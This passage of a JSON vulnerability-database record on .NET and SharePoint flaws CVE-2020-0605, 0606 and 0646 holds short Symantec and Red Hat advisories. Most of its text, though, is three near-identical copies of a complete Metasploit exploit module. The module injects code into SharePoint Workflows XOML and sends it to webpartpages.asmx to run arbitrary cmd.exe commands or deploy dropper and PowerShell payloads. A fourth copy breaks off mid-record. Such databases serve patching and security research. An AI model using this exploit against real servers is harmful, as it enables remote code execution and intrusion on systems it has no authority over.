"https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0605", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2020-01-15T00:26:21", "description": "### Description\n\nMicrosoft .NET Framework is prone to a remote code-execution vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft .NET Framework 3.0 SP2 \n * Microsoft .NET Framework 3.5 \n * Microsoft .NET Framework 3.5.1 \n * Microsoft .NET Framework 4.5.2 \n * Microsoft .NET Framework 4.6 \n * Microsoft .NET Framework 4.6.1 \n * Microsoft .NET Framework 4.6.2 \n * Microsoft .NET Framework 4.7 \n * Microsoft .NET Framework 4.7.1 \n * Microsoft .NET Framework 4.7.2 \n * Microsoft .NET Framework 4.8 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo mitigate the impact of a successful exploit, run the affected application as a user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nNever accept files from untrusted or unknown sources, because they may be malicious in nature. Avoid opening email attachments from unknown or questionable sources.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. 
This tactic may complicate exploit attempts of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2020-01-14T00:00:00", "type": "symantec", "title": "Microsoft .NET Framework CVE-2020-0646 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2020-0646"], "modified": "2020-01-14T00:00:00", "id": "SMNTC-111386", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111386", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-01-15T00:26:13", "description": "### Description\n\nMicrosoft .NET Framework is prone to a remote code-execution vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft .NET Core 3.0 \n * Microsoft .NET Core 3.1 \n * Microsoft .NET Framework 3.0 SP2 \n * Microsoft .NET Framework 3.5 \n * Microsoft .NET Framework 3.5.1 \n * Microsoft .NET Framework 4.5.2 \n * Microsoft .NET Framework 4.6 \n * Microsoft .NET Framework 4.6.1 \n * Microsoft .NET Framework 4.6.2 \n * Microsoft .NET Framework 4.7 \n * Microsoft .NET Framework 4.7.1 \n * Microsoft .NET Framework 4.7.2 \n * Microsoft .NET Framework 4.8 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo mitigate the impact of a successful exploit, run the affected application as a user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. 
Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nNever accept files from untrusted or unknown sources, because they may be malicious in nature. Avoid opening email attachments from unknown or questionable sources.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploit attempts of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2020-01-14T00:00:00", "type": "symantec", "title": "Microsoft .NET Framework CVE-2020-0606 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2020-0606"], "modified": "2020-01-14T00:00:00", "id": "SMNTC-111384", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111384", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-01-15T00:26:13", "description": "### Description\n\nMicrosoft .NET Core is prone to a remote code-execution vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. 
Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft .NET Core 3.0 \n * Microsoft .NET Core 3.1 \n * Microsoft .NET Framework 3.0 SP2 \n * Microsoft .NET Framework 3.5 \n * Microsoft .NET Framework 3.5.1 \n * Microsoft .NET Framework 4.5.2 \n * Microsoft .NET Framework 4.6 \n * Microsoft .NET Framework 4.6.1 \n * Microsoft .NET Framework 4.6.2 \n * Microsoft .NET Framework 4.7 \n * Microsoft .NET Framework 4.7.1 \n * Microsoft .NET Framework 4.7.2 \n * Microsoft .NET Framework 4.8 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo mitigate the impact of a successful exploit, run the affected application as a user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nNever accept files from untrusted or unknown sources, because they may be malicious in nature. Avoid opening email attachments from unknown or questionable sources.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploit attempts of memory-corruption vulnerabilities.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2020-01-14T00:00:00", "type": "symantec", "title": "Microsoft .NET Core CVE-2020-0605 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2020-0605"], "modified": "2020-01-14T00:00:00", "id": "SMNTC-111378", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111378", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2021-12-25T11:23:25", "description": "This Metasploit module exploits a vulnerability within SharePoint and its .NET backend that allows an attacker to execute commands using specially crafted XOML data sent to SharePoint via the Workflows functionality.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-26T00:00:00", "type": "zdt", "title": "SharePoint Workflows XOML Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0646"], "modified": "2020-03-26T00:00:00", "id": "1337DAY-ID-34152", "href": "https://0day.today/exploit/description/34152", 
"sourceData": "# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n include Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SharePoint Workflows XOML Injection',\n 'Description' => %q{\n This module exploits a vulnerability within SharePoint and its .NET backend\n that allows an attacker to execute commands using specially crafted XOML data\n sent to SharePoint via the Workflows functionality.\n },\n 'Author' => [\n 'Spencer McIntyre',\n 'Soroush Dalili'\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2020-0646'],\n ['URL', 'https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/']\n ],\n 'Platform' => 'win',\n 'Targets' => [\n [ 'Windows EXE Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],\n [ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ],\n [ 'Windows Powershell',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :windows_powershell\n ]\n ],\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2020-03-02',\n 'Notes' =>\n {\n 'Stability' => [CRASH_SAFE,],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n 'Reliability' => [REPEATABLE_SESSION],\n },\n 'Privileged' => true\n ))\n\n register_options([\n OptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]),\n OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentication', 'WORKGROUP' ]),\n OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])\n ])\n end\n\n def check\n 
res = execute_command(\"echo #{Rex::Text.rand_text_alphanumeric(4 + rand(8))}\")\n return CheckCode::Unknown('Did not receive an HTTP 200 OK response') unless res&.code == 200\n\n compiler_errors = extract_compiler_errors(res)\n return CheckCode::Unknown('No compiler errors were reported') unless compiler_errors&.length > 0\n\n # once patched you get a specific compiler error message about the type name\n return CheckCode::Safe if compiler_errors[0].to_s =~ /is not a valid language-independent type name/\n\n CheckCode::Vulnerable\n end\n\n def extract_compiler_errors(res)\n return nil unless res&.code == 200\n\n xml_doc = res.get_xml_document\n result = xml_doc.search('//*[local-name()=\\'ValidateWorkflowMarkupAndCreateSupportObjectsResult\\']').text\n return nil if result.length == 0\n\n xml_result = Nokogiri::XML(result)\n xml_result.xpath('//CompilerError/@Text')\n end\n\n def exploit\n # NOTE: Automatic check is implemented by the AutoCheck mixin\n super\n\n case target['Type']\n when :windows_command\n execute_command(payload.encoded)\n when :windows_dropper\n cmd_target = targets.select {|target| target['Type'] == :windows_command}.first\n execute_cmdstager({linemax: cmd_target.opts['Space']})\n when :windows_powershell\n execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))\n end\n end\n\n def escape_command(cmd)\n # a bunch of characters have to be escaped, so use a whitelist of those that are allowed and escape the rest as unicode\n cmd.gsub(/([^a-zA-Z0-9 $:;\\-\\.=\\[\\]\\{\\}\\(\\)])/) { |x| \"\\\\u%.4x\" %x.unpack('C*')[0] }\n end\n\n def execute_command(cmd, opts = {})\n xoml_data = <<-EOS\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <ValidateWorkflowMarkupAndCreateSupportObjects 
xmlns=\"http://microsoft.com/sharepoint/webpartpages\">\n <workflowMarkupText>\n <![CDATA[\n <SequentialWorkflowActivity x:Class=\"MyWorkflow\" x:Name=\"foobar\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" xmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/workflow\">\n <CallExternalMethodActivity x:Name=\"foo\" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start(\"cmd.exe\", \"/c #{escape_command(cmd)}\");private/**/void/**/foobar(){//' />\n </SequentialWorkflowActivity>\n ]]>\n </workflowMarkupText>\n <rulesText></rulesText>\n <configBlob></configBlob>\n <flag>2</flag>\n </ValidateWorkflowMarkupAndCreateSupportObjects>\n </soap:Body>\n</soap:Envelope>\n EOS\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '_vti_bin', 'webpartpages.asmx'),\n 'ctype' => 'text/xml; charset=utf-8',\n 'data' => xoml_data,\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD']\n })\n\n unless res&.code == 200\n print_error('Non-200 HTTP response received while trying to execute the command')\n end\n\n res\n end\nend\n", "sourceHref": "https://0day.today/exploit/34152", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2022-06-24T08:41:36", "description": "This module exploits a vulnerability within SharePoint and its .NET backend that allows an attacker to execute commands using specially crafted XOML data sent to SharePoint via the Workflows functionality.\n", "cvss3": {}, "published": "2020-03-20T21:57:54", "type": "metasploit", "title": "SharePoint Workflows XOML Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-0646"], "modified": "2021-08-27T16:19:43", "id": "MSF:EXPLOIT-WINDOWS-HTTP-SHAREPOINT_WORKFLOWS_XOML-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/sharepoint_workflows_xoml/", "sourceData": "# This module requires Metasploit: 
https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SharePoint Workflows XOML Injection',\n 'Description' => %q{\n This module exploits a vulnerability within SharePoint and its .NET backend\n that allows an attacker to execute commands using specially crafted XOML data\n sent to SharePoint via the Workflows functionality.\n },\n 'Author' => [\n 'Spencer McIntyre',\n 'Soroush Dalili'\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2020-0646'],\n ['URL', 'https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/']\n ],\n 'Platform' => 'win',\n 'Targets' => [\n [ 'Windows EXE Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],\n [ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ],\n [\n 'Windows Powershell',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :windows_powershell\n }\n ]\n ],\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2020-03-02',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE,],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n 'Reliability' => [REPEATABLE_SESSION]\n },\n 'Privileged' => true\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]),\n OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentication', 'WORKGROUP' ]),\n OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])\n ])\n end\n\n def check\n res = execute_command(\"echo 
#{Rex::Text.rand_text_alphanumeric(rand(4..11))}\")\n return CheckCode::Unknown('Did not receive an HTTP 200 OK response') unless res&.code == 200\n\n compiler_errors = extract_compiler_errors(res)\n return CheckCode::Unknown('No compiler errors were reported') unless compiler_errors&.length&.> 0\n\n # once patched you get a specific compiler error message about the type name\n return CheckCode::Safe if compiler_errors[0].to_s =~ /is not a valid language-independent type name/\n\n CheckCode::Vulnerable\n end\n\n def extract_compiler_errors(res)\n return nil unless res&.code == 200\n\n xml_doc = res.get_xml_document\n result = xml_doc.search('//*[local-name()=\\'ValidateWorkflowMarkupAndCreateSupportObjectsResult\\']').text\n return nil if result.empty?\n\n xml_result = Nokogiri::XML(result)\n xml_result.xpath('//CompilerError/@Text')\n end\n\n def exploit\n case target['Type']\n when :windows_command\n execute_command(payload.encoded)\n when :windows_dropper\n cmd_target = targets.select { |target| target['Type'] == :windows_command }.first\n execute_cmdstager({ linemax: cmd_target.opts['Space'] })\n when :windows_powershell\n execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))\n end\n end\n\n def escape_command(cmd)\n # a bunch of characters have to be escaped, so use a whitelist of those that are allowed and escape the rest as unicode\n # rubocop:disable Style/FormatString\n cmd.gsub(/([^a-zA-Z0-9 $:;\\-.=\\[\\]{}()])/) { |x| '\\\\u%.4x' % x.unpack('C*')[0] }\n # rubocop:enable Style/FormatString\n end\n\n def execute_command(cmd, _opts = {})\n xoml_data = <<~EOS\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <ValidateWorkflowMarkupAndCreateSupportObjects xmlns=\"http://microsoft.com/sharepoint/webpartpages\">\n <workflowMarkupText>\n 
<![CDATA[\n <SequentialWorkflowActivity x:Class=\"MyWorkflow\" x:Name=\"foobar\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" xmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/workflow\">\n <CallExternalMethodActivity x:Name=\"foo\" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start(\"cmd.exe\", \"/c #{escape_command(cmd)}\");private/**/void/**/foobar(){//' />\n </SequentialWorkflowActivity>\n ]]>\n </workflowMarkupText>\n <rulesText></rulesText>\n <configBlob></configBlob>\n <flag>2</flag>\n </ValidateWorkflowMarkupAndCreateSupportObjects>\n </soap:Body>\n </soap:Envelope>\n EOS\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '_vti_bin', 'webpartpages.asmx'),\n 'ctype' => 'text/xml; charset=utf-8',\n 'data' => xoml_data,\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD']\n })\n\n unless res&.code == 200\n print_error('Non-200 HTTP response received while trying to execute the command')\n end\n\n res\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/sharepoint_workflows_xoml.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2020-03-29T15:35:52", "description": "", "cvss3": {}, "published": "2020-03-26T00:00:00", "type": "packetstorm", "title": "SharePoint Workflows XOML Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-0646"], "modified": "2020-03-26T00:00:00", "id": "PACKETSTORM:156930", "href": "https://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html", "sourceData": "`# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude 
Msf::Exploit::Powershell \ninclude Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'SharePoint Workflows XOML Injection', \n'Description' => %q{ \nThis module exploits a vulnerability within SharePoint and its .NET backend \nthat allows an attacker to execute commands using specially crafted XOML data \nsent to SharePoint via the Workflows functionality. \n}, \n'Author' => [ \n'Spencer McIntyre', \n'Soroush Dalili' \n], \n'License' => MSF_LICENSE, \n'References' => [ \n['CVE', '2020-0646'], \n['URL', 'https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/'] \n], \n'Platform' => 'win', \n'Targets' => [ \n[ 'Windows EXE Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ], \n[ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ], \n[ 'Windows Powershell', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :windows_powershell \n] \n], \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'DefaultTarget' => 0, \n'DisclosureDate' => '2020-03-02', \n'Notes' => \n{ \n'Stability' => [CRASH_SAFE,], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], \n'Reliability' => [REPEATABLE_SESSION], \n}, \n'Privileged' => true \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]), \nOptString.new('DOMAIN', [ true, 'The domain to use for Windows authentication', 'WORKGROUP' ]), \nOptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]), \nOptString.new('PASSWORD', [ true, 'The password to authenticate with' ]) \n]) \nend \n \ndef check \nres = execute_command(\"echo #{Rex::Text.rand_text_alphanumeric(4 + rand(8))}\") \nreturn CheckCode::Unknown('Did not receive an HTTP 200 OK response') unless res&.code == 200 \n \ncompiler_errors = extract_compiler_errors(res) \nreturn CheckCode::Unknown('No compiler errors were reported') unless 
compiler_errors&.length > 0 \n \n# once patched you get a specific compiler error message about the type name \nreturn CheckCode::Safe if compiler_errors[0].to_s =~ /is not a valid language-independent type name/ \n \nCheckCode::Vulnerable \nend \n \ndef extract_compiler_errors(res) \nreturn nil unless res&.code == 200 \n \nxml_doc = res.get_xml_document \nresult = xml_doc.search('//*[local-name()=\\'ValidateWorkflowMarkupAndCreateSupportObjectsResult\\']').text \nreturn nil if result.length == 0 \n \nxml_result = Nokogiri::XML(result) \nxml_result.xpath('//CompilerError/@Text') \nend \n \ndef exploit \n# NOTE: Automatic check is implemented by the AutoCheck mixin \nsuper \n \ncase target['Type'] \nwhen :windows_command \nexecute_command(payload.encoded) \nwhen :windows_dropper \ncmd_target = targets.select {|target| target['Type'] == :windows_command}.first \nexecute_cmdstager({linemax: cmd_target.opts['Space']}) \nwhen :windows_powershell \nexecute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true)) \nend \nend \n \ndef escape_command(cmd) \n# a bunch of characters have to be escaped, so use a whitelist of those that are allowed and escape the rest as unicode \ncmd.gsub(/([^a-zA-Z0-9 $:;\\-\\.=\\[\\]\\{\\}\\(\\)])/) { |x| \"\\\\u%.4x\" %x.unpack('C*')[0] } \nend \n \ndef execute_command(cmd, opts = {}) \nxoml_data = <<-EOS \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Body> \n<ValidateWorkflowMarkupAndCreateSupportObjects xmlns=\"http://microsoft.com/sharepoint/webpartpages\"> \n<workflowMarkupText> \n<![CDATA[ \n<SequentialWorkflowActivity x:Class=\"MyWorkflow\" x:Name=\"foobar\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" xmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/workflow\"> \n<CallExternalMethodActivity x:Name=\"foo\" 
MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start(\"cmd.exe\", \"/c #{escape_command(cmd)}\");private/**/void/**/foobar(){//' /> \n</SequentialWorkflowActivity> \n]]> \n</workflowMarkupText> \n<rulesText></rulesText> \n<configBlob></configBlob> \n<flag>2</flag> \n</ValidateWorkflowMarkupAndCreateSupportObjects> \n</soap:Body> \n</soap:Envelope> \nEOS \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '_vti_bin', 'webpartpages.asmx'), \n'ctype' => 'text/xml; charset=utf-8', \n'data' => xoml_data, \n'username' => datastore['USERNAME'], \n'password' => datastore['PASSWORD'] \n}) \n \nunless res&.code == 200 \nprint_error('Non-200 HTTP response received while trying to execute the command') \nend \n \nres \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/156930/sharepoint_workflows_xoml.rb.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhatcve": [{"lastseen": "2022-06-08T08:09:37", "description": "A vulnerability related to checking the source makeup of a file has been reported in .NET software. 
A remote attacker can exploit this vulnerability to execute arbitrary code by tricking a user into opening a specially crafted file.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-01-14T20:09:01", "type": "redhatcve", "title": "CVE-2020-0606", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0606"], "modified": "2022-06-08T06:51:19", "id": "RH:CVE-2020-0606", "href": "https://access.redhat.com/security/cve/cve-2020-0606", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-08T08:09:40", "description": "A vulnerability related to checking the source markup of a file has been reported in .NET software. 
A remote attacker can exploit this vulnerability to execute arbitrary code by tricking a user into opening a specially crafted file.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-01-14T20:09:01", "type": "redhatcve", "title": "CVE-2020-0605", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605"], "modified": "2022-06-08T06:51:07", "id": "RH:CVE-2020-0605", "href": "https://access.redhat.com/security/cve/cve-2020-0605", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-05-13T17:49:15", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-31T00:00:00", "type": "exploitdb", "title": "SharePoint Workflows - XOML Injection 
(Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-0646", "CVE-2020-0646"], "modified": "2020-03-31T00:00:00", "id": "EDB-ID:48275", "href": "https://www.exploit-db.com/exploits/48275", "sourceData": "# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::Remote::AutoCheck\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SharePoint Workflows XOML Injection',\r\n 'Description' => %q{\r\n This module exploits a vulnerability within SharePoint and its .NET backend\r\n that allows an attacker to execute commands using specially crafted XOML data\r\n sent to SharePoint via the Workflows functionality.\r\n },\r\n 'Author' => [\r\n 'Spencer McIntyre',\r\n 'Soroush 